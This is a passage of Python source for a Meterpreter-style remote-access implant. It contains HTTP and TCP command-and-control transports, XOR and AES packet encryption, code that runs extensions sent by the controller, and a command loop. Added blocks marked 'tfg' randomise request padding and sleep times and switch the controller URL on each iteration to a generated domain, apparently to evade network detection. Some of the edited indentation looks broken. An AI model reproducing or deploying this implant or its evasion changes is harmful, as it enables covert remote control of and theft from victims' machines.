        self.stderr_reader = STDProcessBuffer(self.stderr, self.is_alive, name='STDProcessBuffer.stderr')
        self.stderr_reader.start()

    def write(self, channel_data):
        length = self.stdin.write(channel_data)
        self.stdin.flush()
        if self.echo_protection:
            end_time = time.time() + 0.5
            out_data = bytes()
            while (time.time() < end_time) and (out_data != channel_data):
                if self.stdout_reader.is_read_ready():
                    out_data = self.stdout_reader.peek(len(channel_data))
            if out_data == channel_data:
                self.stdout_reader.read(len(channel_data))
        return length
export(STDProcess)

class Transport(object):
    def __init__(self):
        self.communication_timeout = SESSION_COMMUNICATION_TIMEOUT
        self.communication_last = 0
        self.retry_total = SESSION_RETRY_TOTAL
        self.retry_wait = SESSION_RETRY_WAIT
        self.request_retire = False
        self.aes_enabled = False
        self.aes_key = None

    def __repr__(self):
        return "<{0} url='{1}' >".format(self.__class__.__name__, self.url)

    @property
    def communication_has_expired(self):
        return self.communication_last + self.communication_timeout < time.time()

    @property
    def should_retire(self):
        return self.communication_has_expired or self.request_retire

    @staticmethod
    def from_request(request):
        url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
        if url.startswith('tcp'):
            transport = TcpTransport(url)
        elif url.startswith('http'):
            proxy = packet_get_tlv(request, TLV_TYPE_TRANS_PROXY_HOST).get('value')
            user_agent = packet_get_tlv(request, TLV_TYPE_TRANS_UA).get('value', HTTP_USER_AGENT)
            http_headers = packet_get_tlv(request, TLV_TYPE_TRANS_HEADERS).get('value', None)
            transport = HttpTransport(url, proxy=proxy, user_agent=user_agent)
            if http_headers:
                headers = {}
                for h in http_headers.strip().split("\r\n"):
                    p = h.split(':')
                    headers[p[0].upper()] = ''.join(p[1:0])
                http_host = headers.get('HOST')
                http_cookie = headers.get('COOKIE')
                http_referer = headers.get('REFERER')
                transport = HttpTransport(url, proxy=proxy, user_agent=user_agent, http_host=http_host,
                        http_cookie=http_cookie, http_referer=http_referer)
        transport.communication_timeout = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value', SESSION_COMMUNICATION_TIMEOUT)
        transport.retry_total = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value', SESSION_RETRY_TOTAL)
        transport.retry_wait = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value', SESSION_RETRY_WAIT)
        return transport

    def _activate(self):
        return True

    def activate(self):
        self.aes_key = None
        self.aes_enabled = False
        end_time = time.time() + self.retry_total
        while time.time() < end_time:
            try:
                activate_succeeded = self._activate()
            except:
                activate_succeeded = False
            if activate_succeeded:
                self.communication_last = time.time()
                return True
            time.sleep(self.retry_wait)
        return False

    def _deactivate(self):
        return

    def deactivate(self):
        try:
            self._deactivate()
        except:
            pass
        self.communication_last = 0
        return True

    def decrypt_packet(self, pkt):
        if pkt and len(pkt) > PACKET_HEADER_SIZE:
            xor_key = struct.unpack('BBBB', pkt[:PACKET_XOR_KEY_SIZE])
            raw = xor_bytes(xor_key, pkt)
            enc_offset = PACKET_XOR_KEY_SIZE + PACKET_SESSION_GUID_SIZE
            enc_flag = struct.unpack('>I', raw[enc_offset:enc_offset+PACKET_ENCRYPT_FLAG_SIZE])[0]
            if enc_flag == ENC_AES256:
                iv = raw[PACKET_HEADER_SIZE:PACKET_HEADER_SIZE+16]
                encrypted = raw[PACKET_HEADER_SIZE+len(iv):]
                return met_aes_decrypt(self.aes_key, iv, encrypted)
            else:
                return raw[PACKET_HEADER_SIZE:]
        return None

    def get_packet(self):
        self.request_retire = False
        try:
            pkt = self.decrypt_packet(self._get_packet())
        except:
            debug_traceback()
            return None
        if pkt is None:
            return None
        self.communication_last = time.time()
        return pkt

    def encrypt_packet(self, pkt):
        # The packet now has to contain session GUID and encryption flag info
        # And given that we're not yet supporting AES, we're going to just
        # always return the session guid and the encryption flag set to 0
        enc_type = ENC_NONE
        if self.aes_key:
            # The encryption key is present, but we should only used the key
            # when it is enabled. If we use it before it's enabled, then we
            # end up encrypting the packet that contains the key before
            # sending it back to MSF, and it won't be able to decrypt it yet.
            if self.aes_enabled:
                iv = rand_bytes(16)
                enc = iv + met_aes_encrypt(self.aes_key, iv, pkt[8:])
                hdr = struct.pack('>I', len(enc) + 8) + pkt[4:8]
                pkt = hdr + enc
                # We change the packet encryption type to tell MSF that
                # the packet is encrypted.
                enc_type = ENC_AES256
            else:
                # If we get here, it means that the AES encryption key
                # is ready to use from this point onwards as the last
                # plain text packet has been sent back to MSF containing
                # the key, and so MSF will be able to handle encrypted
                # communications from here.
                self.aes_enabled = True

        xor_key = rand_xor_key()
        raw = binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')) + struct.pack('>I', enc_type) + pkt
        result = struct.pack('BBBB', *xor_key) + xor_bytes(xor_key, raw)
        return result

    def send_packet(self, pkt):
        pkt = struct.pack('>I', len(pkt) + 4) + pkt
        self.request_retire = False
        try:
            self._send_packet(self.encrypt_packet(pkt))
        except:
            debug_traceback()
            return False
        self.communication_last = time.time()
        return True

    def tlv_pack_timeouts(self):
        response  = tlv_pack(TLV_TYPE_TRANS_COMM_TIMEOUT, self.communication_timeout)
        response += tlv_pack(TLV_TYPE_TRANS_RETRY_TOTAL, self.retry_total)
        response += tlv_pack(TLV_TYPE_TRANS_RETRY_WAIT, self.retry_wait)
        return response

    def tlv_pack_transport_group(self):
        trans_group  = tlv_pack(TLV_TYPE_TRANS_URL, self.url)
        trans_group += self.tlv_pack_timeouts()
        return trans_group

class HttpTransport(Transport):
    def __init__(self, url, proxy=None, user_agent=None, http_host=None, http_referer=None, http_cookie=None):
        super(HttpTransport, self).__init__()
        opener_args = []
        scheme = url.split(':', 1)[0]
        if scheme == 'https' and ((sys.version_info[0] == 2 and sys.version_info >= (2, 7, 9)) or sys.version_info >= (3, 4, 3)):
            import ssl
            ssl_ctx = ssl.SSLContext(ssl.PROTOCOL_SSLv23)
            ssl_ctx.check_hostname = False
            ssl_ctx.verify_mode = ssl.CERT_NONE
            opener_args.append(urllib.HTTPSHandler(0, ssl_ctx))
        if proxy:
            opener_args.append(urllib.ProxyHandler({scheme: proxy}))
            opener_args.append(urllib.ProxyBasicAuthHandler())
        self.proxy = proxy
        opener = urllib.build_opener(*opener_args)
        opener.addheaders = []
        if user_agent:
            opener.addheaders.append(('User-Agent', user_agent))
        if http_cookie:
            opener.addheaders.append(('Cookie', http_cookie))
        if http_referer:
            opener.addheaders.append(('Referer', http_referer))
        self.user_agent = user_agent
        urllib.install_opener(opener)
        self.url = url
        self._http_request_headers = {'Content-Type': 'application/octet-stream'}
        if http_host:
            self._http_request_headers['Host'] = http_host
        self._first_packet = None
        self._empty_cnt = 0

    def _get_packet(self):
        if self._first_packet:
            packet = self._first_packet
            self._first_packet = None
            return packet
        packet = None
        xor_key = None
        url_h = None
        request = urllib.Request(self.url, None, self._http_request_headers)
        urlopen_kwargs = {}
        if sys.version_info > (2, 6):
            urlopen_kwargs['timeout'] = self.communication_timeout
        try:
            url_h = urllib.urlopen(request, **urlopen_kwargs)
            if url_h.code == 200:
                packet = url_h.read()
                if len(packet) < PACKET_HEADER_SIZE:
                    packet = None  # looks corrupt
                else:
                    xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
                    header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
                    pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF + PACKET_LENGTH_SIZE])[0] - 8
                    if len(packet) != (pkt_length + PACKET_HEADER_SIZE):
                        packet = None  # looks corrupt
        except:
            debug_traceback('[-] failure to receive packet from ' + self.url)

        if not packet:
            if url_h and url_h.code == 200:
                # server has nothing for us but this is fine so update the communication time and wait
                self.communication_last = time.time()

				time.sleep(float(random.randrange(0,10000)) / 1000)
            
            # ************************ VARIABLE SIZES tfg**************************************
            
            sizes_requests = [0, 50, 130, 70]
            
            random.seed()
            size = sizes_requests[random.randrange(0,len(sizes_requests))]
            variable = ''
            
            for n in range(size):
            	variable = variable + '\x00'
				
            self._http_request_headers['Variable'] = variable
            
            # *******************************************************************************
            return packet

        self._empty_cnt = 0
        return packet

    def _send_packet(self, packet):
        request = urllib.Request(self.url, packet, self._http_request_headers)
        urlopen_kwargs = {}
        if sys.version_info > (2, 6):
            urlopen_kwargs['timeout'] = self.communication_timeout
        url_h = urllib.urlopen(request, **urlopen_kwargs)
        response = url_h.read()

    def patch_uri_path(self, new_path):
        match = re.match(r'https?://[^/]+(/.*$)', self.url)
        if match is None:
            return False
        self.url = self.url[:match.span(1)[0]] + new_path
        return True

    def tlv_pack_transport_group(self):
        trans_group  = super(HttpTransport, self).tlv_pack_transport_group()
        if self.user_agent:
            trans_group += tlv_pack(TLV_TYPE_TRANS_UA, self.user_agent)
        if self.proxy:
            trans_group += tlv_pack(TLV_TYPE_TRANS_PROXY_HOST, self.proxy)
        return trans_group

class TcpTransport(Transport):
    def __init__(self, url, socket=None):
        super(TcpTransport, self).__init__()
        self.url = url
        self.socket = socket
        self._cleanup_thread = None
        self._first_packet = True

    def _sock_cleanup(self, sock):
        remaining_time = self.communication_timeout
        while remaining_time > 0:
            iter_start_time = time.time()
            if select.select([sock], [], [], remaining_time)[0]:
                if len(sock.recv(4096)) == 0:
                    break
            remaining_time -= time.time() - iter_start_time
        sock.close()

    def _activate(self):
        address, port = self.url[6:].rsplit(':', 1)
        port = int(port.rstrip('/'))
        timeout = max(self.communication_timeout, 30)
        if address in ('', '0.0.0.0', '::'):
            try:
                server_sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
                server_sock.setsockopt(socket.IPPROTO_IPV6, socket.IPV6_V6ONLY, 0)
            except (AttributeError, socket.error):
                server_sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            server_sock.bind(('', port))
            server_sock.listen(1)
            if not select.select([server_sock], [], [], timeout)[0]:
                server_sock.close()
                return False
            sock, _ = server_sock.accept()
            server_sock.close()
        else:
            if ':' in address:
                sock = socket.socket(socket.AF_INET6, socket.SOCK_STREAM)
            else:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
            sock.settimeout(timeout)
            sock.connect((address, port))
            sock.settimeout(None)
        self.socket = sock
        self._first_packet = True
        return True

    def _deactivate(self):
        cleanup = threading.Thread(target=self._sock_cleanup, args=(self.socket,))
        cleanup.run()
        self.socket = None

    def _get_packet(self):
        first = self._first_packet
        self._first_packet = False
        if not select.select([self.socket], [], [], 0.5)[0]:
            return bytes()
        packet = self.socket.recv(PACKET_HEADER_SIZE)
        if packet == '':  # remote is closed
            self.request_retire = True
            return None
        if len(packet) != PACKET_HEADER_SIZE:
            if first and len(packet) == 4:
                received = 0
                header = packet[:4]
                pkt_length = struct.unpack('>I', header)[0]
                self.socket.settimeout(max(self.communication_timeout, 30))
                while received < pkt_length:
                    received += len(self.socket.recv(pkt_length - received))
                self.socket.settimeout(None)
                return self._get_packet()
            return None

        xor_key = struct.unpack('BBBB', packet[:PACKET_XOR_KEY_SIZE])
        # XOR the whole header first
        header = xor_bytes(xor_key, packet[:PACKET_HEADER_SIZE])
        # Extract just the length
        pkt_length = struct.unpack('>I', header[PACKET_LENGTH_OFF:PACKET_LENGTH_OFF+PACKET_LENGTH_SIZE])[0]
        pkt_length -= 8
        # Read the rest of the packet
        rest = bytes()
        while len(rest) < pkt_length:
            rest += self.socket.recv(pkt_length - len(rest))
        # return the whole packet, as it's decoded separately
        return packet + rest

    def _send_packet(self, packet):
        self.socket.send(packet)

    @classmethod
    def from_socket(cls, sock):
        url = 'tcp://'
        address, port = sock.getsockname()[:2]
        # this will need to be changed if the bind stager ever supports binding to a specific address
        if not address in ('', '0.0.0.0', '::'):
            address, port = sock.getpeername()[:2]
        url += address + ':' + str(port)
        return cls(url, sock)

class PythonMeterpreter(object):
    def __init__(self, transport):
        self.transport = transport
        self._transport_sleep = None
        self.running = False
        self.last_registered_extension = None
        self.extension_functions = {}
        self.channels = {}
        self.next_channel_id = 1
        self.interact_channels = []
        self.processes = {}
        self.next_process_id = 1
        self.transports = [self.transport]
        self.session_expiry_time = SESSION_EXPIRATION_TIMEOUT
        self.session_expiry_end = time.time() + self.session_expiry_time
        for func in list(filter(lambda x: x.startswith('_core'), dir(self))):
            self.extension_functions[func[1:]] = getattr(self, func)
        self.running = True

    def register_extension(self, extension_name):
        self.last_registered_extension = extension_name
        return self.last_registered_extension

    def register_function(self, func):
        self.extension_functions[func.__name__] = func
        return func

    def register_function_if(self, condition):
        if condition:
            return self.register_function
        else:
            return lambda function: function

    def register_function_windll(self, func):
        if has_windll:
            self.register_function(func)
        return func

    def add_channel(self, channel):
        if not isinstance(channel, MeterpreterChannel):
            debug_print('[-] channel object is not an instance of MeterpreterChannel')
            raise TypeError('invalid channel object')
        idx = self.next_channel_id
        self.channels[idx] = channel
        debug_print('[*] added channel id: ' + str(idx) + ' type: ' + channel.__class__.__name__)
        self.next_channel_id += 1
        return idx

    def add_process(self, process):
        idx = self.next_process_id
        self.processes[idx] = process
        debug_print('[*] added process id: ' + str(idx))
        self.next_process_id += 1
        return idx

    def close_channel(self, channel_id):
        if channel_id not in self.channels:
            return False
        channel = self.channels[channel_id]
        try:
            channel.close()
        except Exception:
            debug_traceback('[-] failed to close channel id: ' + str(channel_id))
            return False
        del self.channels[channel_id]
        if channel_id in self.interact_channels:
            self.interact_channels.remove(channel_id)
        debug_print('[*] closed and removed channel id: ' + str(channel_id))
        return True

    def get_packet(self):
        pkt = self.transport.get_packet()
        if pkt is None and self.transport.should_retire:
            self.transport_change()
        return pkt

    def send_packet(self, packet):
        send_succeeded = self.transport.send_packet(packet)
        if not send_succeeded and self.transport.should_retire:
            self.transport_change()
        return send_succeeded

    @property
    def session_has_expired(self):
        if self.session_expiry_time == 0:
            return False
        return time.time() > self.session_expiry_end

    def transport_add(self, new_transport):
        new_position = self.transports.index(self.transport)
        self.transports.insert(new_position, new_transport)

    def transport_change(self, new_transport=None):
        if new_transport is None:
            new_transport = self.transport_next()
        self.transport.deactivate()
        debug_print('[*] changing transport to: ' + new_transport.url)
        while not new_transport.activate():
            new_transport = self.transport_next(new_transport)
            debug_print('[*] changing transport to: ' + new_transport.url)
        self.transport = new_transport

    def transport_next(self, current_transport=None):
        if current_transport is None:
            current_transport = self.transport
        new_idx = self.transports.index(current_transport) + 1
        if new_idx == len(self.transports):
            new_idx = 0
        return self.transports[new_idx]

    def transport_prev(self, current_transport=None):
        if current_transport is None:
            current_transport = self.transport
        new_idx = self.transports.index(current_transport) - 1
        if new_idx == -1:
            new_idx = len(self.transports) - 1
        return self.transports[new_idx]

    def run(self):
        while self.running and not self.session_has_expired:
            request = self.get_packet()
            if request:
                response = self.create_response(request)
                if response:
                    self.send_packet(response)
                if self._transport_sleep:
                    self.transport.deactivate()
                    time.sleep(self._transport_sleep)
                    self._transport_sleep = None
                    if not self.transport.activate():
                        self.transport_change()
                    continue
            # iterate over the keys because self.channels could be modified if one is closed
            channel_ids = list(self.channels.keys())
            for channel_id in channel_ids:
                channel = self.channels[channel_id]
                data = bytes()
                write_request_parts = []
                if isinstance(channel, MeterpreterProcess):
                    if channel_id in self.interact_channels:
                        proc_h = channel.proc_h
                        if proc_h.stderr_reader.is_read_ready():
                            data += proc_h.stderr_reader.read()
                        if proc_h.stdout_reader.is_read_ready():
                            data += proc_h.stdout_reader.read()
                    if not channel.is_alive():
                        self.handle_dead_resource_channel(channel_id)
                        channel.close()
                elif isinstance(channel, MeterpreterSocketTCPClient):
                    while select.select([channel.fileno()], [], [], 0)[0]:
                        try:
                            d = channel.read(1)
                        except socket.error:
                            d = bytes()
                        if len(d) == 0:
                            self.handle_dead_resource_channel(channel_id)
                            break
                        data += d
                elif isinstance(channel, MeterpreterSocketTCPServer):
                    if select.select([channel.fileno()], [], [], 0)[0]:
                        (client_sock, client_addr) = channel.sock.accept()
                        server_addr = channel.sock.getsockname()
                        client_channel_id = self.add_channel(MeterpreterSocketTCPClient(client_sock))
                        self.send_packet(tlv_pack_request('stdapi_net_tcp_channel_open', [
                            {'type': TLV_TYPE_CHANNEL_ID, 'value': client_channel_id},
                            {'type': TLV_TYPE_CHANNEL_PARENTID, 'value': channel_id},
                            {'type': TLV_TYPE_LOCAL_HOST, 'value': server_addr[0]},
                            {'type': TLV_TYPE_LOCAL_PORT, 'value': server_addr[1]},
                            {'type': TLV_TYPE_PEER_HOST, 'value': client_addr[0]},
                            {'type': TLV_TYPE_PEER_PORT, 'value': client_addr[1]},
                        ]))
                elif isinstance(channel, MeterpreterSocketUDPClient):
                    if select.select([channel.fileno()], [], [], 0)[0]:
                        try:
                            data, peer_address = channel.sock.recvfrom(65535)
                        except socket.error:
                            self.handle_dead_resource_channel(channel_id)
                        else:
                            write_request_parts.extend([
                                {'type': TLV_TYPE_PEER_HOST, 'value': peer_address[0]},
                                {'type': TLV_TYPE_PEER_PORT, 'value': peer_address[1]},
                            ])
                if data:
                    write_request_parts.extend([
                        {'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
                        {'type': TLV_TYPE_CHANNEL_DATA, 'value': data},
                        {'type': TLV_TYPE_LENGTH, 'value': len(data)},
                    ])
                    self.send_packet(tlv_pack_request('core_channel_write', write_request_parts))
                    
           	# ************************* ADDED TO CHANGE THE URL IN EVERY REQUEST **************************************
                    
           
            self.transport.url = 'https://'+generate_domain()+'/KTRhg_yaxFhjGXYNAWP4iwOxsNqPIoApEWI/'  
           
            
            # ************************* *************************************** **************************************
                    

    def handle_dead_resource_channel(self, channel_id):
        if channel_id in self.interact_channels:
            self.interact_channels.remove(channel_id)
        self.send_packet(tlv_pack_request('core_channel_close', [
            {'type': TLV_TYPE_CHANNEL_ID, 'value': channel_id},
        ]))

    def _core_set_uuid(self, request, response):
        new_uuid = packet_get_tlv(request, TLV_TYPE_UUID)
        if new_uuid:
            PAYLOAD_UUID = binascii.b2a_hex(new_uuid['value'])
        return ERROR_SUCCESS, response

    def _core_enumextcmd(self, request, response):
        id_start = packet_get_tlv(request, TLV_TYPE_UINT)['value']
        id_end = packet_get_tlv(request, TLV_TYPE_LENGTH)['value'] + id_start
        for func_name in self.extension_functions.keys():
            command_id = cmd_string_to_id(func_name)
            if command_id is None:
                continue
            if id_start < command_id and command_id < id_end:
                response += tlv_pack(TLV_TYPE_UINT, command_id)
        return ERROR_SUCCESS, response

    def _core_get_session_guid(self, request, response):
        response += tlv_pack(TLV_TYPE_SESSION_GUID, binascii.a2b_hex(bytes(SESSION_GUID, 'UTF-8')))
        return ERROR_SUCCESS, response

    def _core_set_session_guid(self, request, response):
        new_guid = packet_get_tlv(request, TLV_TYPE_SESSION_GUID)
        if new_guid:
            SESSION_GUID = binascii.b2a_hex(new_guid['value'])
        return ERROR_SUCCESS, response

    def _core_machine_id(self, request, response):
        serial = ''
        machine_name = platform.uname()[1]
        if has_windll:
            from ctypes import wintypes

            k32 = ctypes.windll.kernel32
            sys_dir = ctypes.create_unicode_buffer(260)
            if not k32.GetSystemDirectoryW(ctypes.byref(sys_dir), 260):
                return ERROR_FAILURE_WINDOWS

            vol_buf = ctypes.create_unicode_buffer(260)
            fs_buf = ctypes.create_unicode_buffer(260)
            serial_num = wintypes.DWORD(0)

            if not k32.GetVolumeInformationW(ctypes.c_wchar_p(sys_dir.value[:3]),
                    vol_buf, ctypes.sizeof(vol_buf), ctypes.byref(serial_num), None,
                    None, fs_buf, ctypes.sizeof(fs_buf)):
                return ERROR_FAILURE_WINDOWS
            serial_num = serial_num.value
            serial = "%04x" % ((serial_num >> 16) & 0xffff) + '-' "%04x" % (serial_num & 0xffff)
        else:
            serial = get_hdd_label()

        response += tlv_pack(TLV_TYPE_MACHINE_ID, "%s:%s" % (serial, machine_name))
        return ERROR_SUCCESS, response

    def _core_native_arch(self, request, response):
        response += tlv_pack(TLV_TYPE_STRING, get_native_arch())
        return ERROR_SUCCESS, response

    def _core_patch_url(self, request, response):
        if not isinstance(self.transport, HttpTransport):
            return ERROR_FAILURE, response
        new_uri_path = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
        if not self.transport.patch_uri_path(new_uri_path):
            return ERROR_FAILURE, response
        return ERROR_SUCCESS, response

    def _core_negotiate_tlv_encryption(self, request, response):
        debug_print('[*] Negotiating TLV encryption')
        self.transport.aes_key = rand_bytes(32)
        self.transport.aes_enabled = False
        response += tlv_pack(TLV_TYPE_SYM_KEY_TYPE, ENC_AES256)
        der = packet_get_tlv(request, TLV_TYPE_RSA_PUB_KEY)['value'].strip()
        debug_print('[*] RSA key: ' + str(binascii.b2a_hex(der)))
        debug_print('[*] AES key: ' + hex(met_rsa.b2i(self.transport.aes_key)))
        enc_key = met_rsa_encrypt(der, self.transport.aes_key)
        debug_print('[*] Encrypted AES key: ' + hex(met_rsa.b2i(enc_key)))
        response += tlv_pack(TLV_TYPE_ENC_SYM_KEY, enc_key)
        debug_print('[*] TLV encryption sorted')
        return ERROR_SUCCESS, response

    def _core_loadlib(self, request, response):
        data_tlv = packet_get_tlv(request, TLV_TYPE_DATA)
        if (data_tlv['type'] & TLV_META_TYPE_COMPRESSED) == TLV_META_TYPE_COMPRESSED:
            return ERROR_FAILURE, response

        libname = '???'
        match = re.search(r'^meterpreter\.register_extension\(\'([a-zA-Z0-9]+)\'\)$', str(data_tlv['value']), re.MULTILINE)
        if match is not None:
            libname = match.group(1)

        self.last_registered_extension = None
        symbols_for_extensions = {'meterpreter': self}
        symbols_for_extensions.update(EXPORTED_SYMBOLS)
        i = code.InteractiveInterpreter(symbols_for_extensions)
        i.runcode(compile(data_tlv['value'], 'ext_server_' + libname + '.py', 'exec'))
        extension_name = self.last_registered_extension

        if extension_name:
            check_extension = lambda x: x.startswith(extension_name)
            lib_methods = list(filter(check_extension, list(self.extension_functions.keys())))
            for method in lib_methods:
                response += tlv_pack(TLV_TYPE_UINT, cmd_string_to_id(method))
        return ERROR_SUCCESS, response

    def _core_shutdown(self, request, response):
        response += tlv_pack(TLV_TYPE_BOOL, True)
        self.running = False
        return ERROR_SUCCESS, response

    def _core_transport_add(self, request, response):
        new_transport = Transport.from_request(request)
        self.transport_add(new_transport)
        return ERROR_SUCCESS, response

    def _core_transport_change(self, request, response):
        new_transport = Transport.from_request(request)
        self.transport_add(new_transport)
        self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
        self.transport_change(new_transport)
        return None

    def _core_transport_list(self, request, response):
        if self.session_expiry_time > 0:
            response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
        response += tlv_pack(TLV_TYPE_TRANS_GROUP, self.transport.tlv_pack_transport_group())

        transport = self.transport_next()
        while transport != self.transport:
            response += tlv_pack(TLV_TYPE_TRANS_GROUP, transport.tlv_pack_transport_group())
            transport = self.transport_next(transport)
        return ERROR_SUCCESS, response

    def _core_transport_next(self, request, response):
        new_transport = self.transport_next()
        if new_transport == self.transport:
            return ERROR_FAILURE, response
        self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
        self.transport_change(new_transport)
        return None

    def _core_transport_prev(self, request, response):
        new_transport = self.transport_prev()
        if new_transport == self.transport:
            return ERROR_FAILURE, response
        self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
        self.transport_change(new_transport)
        return None

    def _core_transport_remove(self, request, response):
        url = packet_get_tlv(request, TLV_TYPE_TRANS_URL)['value']
        if self.transport.url == url:
            return ERROR_FAILURE, response
        transport_found = False
        for transport in self.transports:
            if transport.url == url:
                transport_found = True
                break
        if transport_found:
            self.transports.remove(transport)
            return ERROR_SUCCESS, response
        return ERROR_FAILURE, response

    def _core_transport_set_timeouts(self, request, response):
        timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_SESSION_EXP).get('value')
        if not timeout_value is None:
            self.session_expiry_time = timeout_value
            self.session_expiry_end = time.time() + self.session_expiry_time
        timeout_value = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT).get('value')
        if timeout_value:
            self.transport.communication_timeout = timeout_value
        retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_TOTAL).get('value')
        if retry_value:
            self.transport.retry_total = retry_value
        retry_value = packet_get_tlv(request, TLV_TYPE_TRANS_RETRY_WAIT).get('value')
        if retry_value:
            self.transport.retry_wait = retry_value

        if self.session_expiry_time > 0:
            response += tlv_pack(TLV_TYPE_TRANS_SESSION_EXP, self.session_expiry_end - time.time())
        response += self.transport.tlv_pack_timeouts()
        return ERROR_SUCCESS, response

    def _core_transport_sleep(self, request, response):
        seconds = packet_get_tlv(request, TLV_TYPE_TRANS_COMM_TIMEOUT)['value']
        self.send_packet(response + tlv_pack(TLV_TYPE_RESULT, ERROR_SUCCESS))
        if seconds:
            self._transport_sleep = seconds
        return ERROR_SUCCESS, response

    def _core_channel_open(self, request, response):
        channel_type = packet_get_tlv(request, TLV_TYPE_CHANNEL_TYPE)
        handler = 'channel_open_' + channel_type['value']
        if handler not in self.extension_functions:
            debug_print('[-] core_channel_open missing handler: ' + handler)
            return error_result(NotImplementedError), response
        debug_print('[*] core_channel_open dispatching to handler: ' + handler)
        handler = self.extension_functions[handler]
        return handler(request, response)

    def _core_channel_close(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if not self.close_channel(channel_id):
            return ERROR_FAILURE, response
        return ERROR_SUCCESS, response

    def _core_channel_eof(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        status, response = channel.core_eof(request, response)
        return status, response

    def _core_channel_interact(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        toggle = packet_get_tlv(request, TLV_TYPE_BOOL)['value']
        if toggle:
            if channel_id in self.interact_channels:
                self.interact_channels.remove(channel_id)
            else:
                self.interact_channels.append(channel_id)
        elif channel_id in self.interact_channels:
            self.interact_channels.remove(channel_id)
        return ERROR_SUCCESS, response

    def _core_channel_read(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        status, response = channel.core_read(request, response)
        if not channel.is_alive():
            self.handle_dead_resource_channel(channel_id)
        return status, response

    def _core_channel_write(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        status = ERROR_FAILURE
        if channel.is_alive():
            status, response = channel.core_write(request, response)
        # evaluate channel.is_alive() twice because it could have changed
        if not channel.is_alive():
            self.handle_dead_resource_channel(channel_id)
        return status, response

    def _core_channel_seek(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        return channel.core_seek(request, response)

    def _core_channel_tell(self, request, response):
        channel_id = packet_get_tlv(request, TLV_TYPE_CHANNEL_ID)['value']
        if channel_id not in self.channels:
            return ERROR_FAILURE, response
        channel = self.channels[channel_id]
        return channel.core_tell(request, response)

    def create_response(self, request):
        response = struct.pack('>I', PACKET_TYPE_RESPONSE)
        commd_id_tlv = packet_get_tlv(request, TLV_TYPE_COMMAND_ID)
        response += tlv_pack(commd_id_tlv)
        response += tlv_pack(TLV_TYPE_UUID, binascii.a2b_hex(bytes(PAYLOAD_UUID, 'UTF-8')))

        handler_name = cmd_id_to_string(commd_id_tlv['value'])
        if handler_name in self.extension_functions:
            handler = self.extension_functions[handler_name]
            try:
                debug_print('[*] running method ' + handler_name)
                result = handler(request, response)
                if result is None:
                    debug_print("[-] handler result is none")
                    return
                result, response = result
            except Exception:
                debug_traceback('[-] method ' + handler_name + ' resulted in an error')
                result = error_result()
            else:
                if result != ERROR_SUCCESS:
                    debug_print('[-] method ' + handler_name + ' resulted in error: #' + str(result))
        else:
            if handler_name is None:
                debug_print('[-] command id ' + str(commd_id_tlv['value']) + ' was requested but does not exist')
            else:
                debug_print('[-] method ' + handler_name + ' was requested but does not exist')
            result = error_result(NotImplementedError)

        reqid_tlv = packet_get_tlv(request, TLV_TYPE_REQUEST_ID)
        if not reqid_tlv:
            debug_print("[-] no request ID found")
            return
        response += tlv_pack(reqid_tlv)
        debug_print("[*] sending response packet")
        return response + tlv_pack(TLV_TYPE_RESULT, result)


import codecs,imp,base64,zlib
met_aes = imp.new_module('met_aes')
met_rsa = imp.new_module('met_rsa')
